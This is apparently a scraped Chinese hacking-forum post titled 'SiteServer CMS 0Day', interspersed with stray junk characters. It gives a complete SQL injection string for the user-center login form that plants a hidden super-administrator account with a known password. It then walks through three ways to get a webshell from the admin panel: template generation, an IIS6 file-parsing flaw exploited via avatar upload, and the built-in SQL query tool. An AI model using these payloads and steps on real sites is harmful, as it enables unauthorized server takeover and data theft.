SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

9 P! q, Z/ f" g/ |stieserver官网:www.siteserver.cn

/ p7 X1 _- P+ b2 I1 Z

EXP:
/ Y$ G2 x- G8 v
直接访问UserCenter/login.aspx


% G$ p+ t' l: @1 f% k* r
9 K2 |5 t% y6 S* Q# J: k, n- ], j用户名处输入：
1 p) x0 p+ J8 l% r4 J
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--



密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


3 C" ~, _1 B& M) E+ P# z
之后再访问后台SiteServer/login.aspx用插入的用户登陆

0 ^6 _' W6 l$ e) B/ N

3 c# v$ W5 j) M+ P7 z, N) v8 e- P后台拿webshell的三种方法：
  a7 g5 r0 d# ~" i0 ^- k
1 k4 ~$ z1 ]$ v* v% R. B0 o一、
; y4 U- v7 m0 D2 H2 H2 T3 d
) A5 b# P" \# X1 {# f: G站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. W6 J6 [" s6 m
二、
' w3 |, ~# u, V- x; |, v+ E
成员权限-》添加用户-》用户名为：1.asp

& b; F) ^( f8 Z2 ~, T' Rhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
3 D. z2 s& @' \: \8 s7 v$ E
（ps：后台添加用户时不会验证是否含有非法字符）
* L- @3 C, \( v9 K7 W
三、

系统工具-》实用工具-》机器参数查看
7 M/ w7 o6 ]! }9 u可以看到数据库类型、名称，WEB路径

; ^) s: @. c6 z1 [系统工具-》数据库工具-》SQL语句查询
# ?/ f  `( n+ ^- |9 l这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。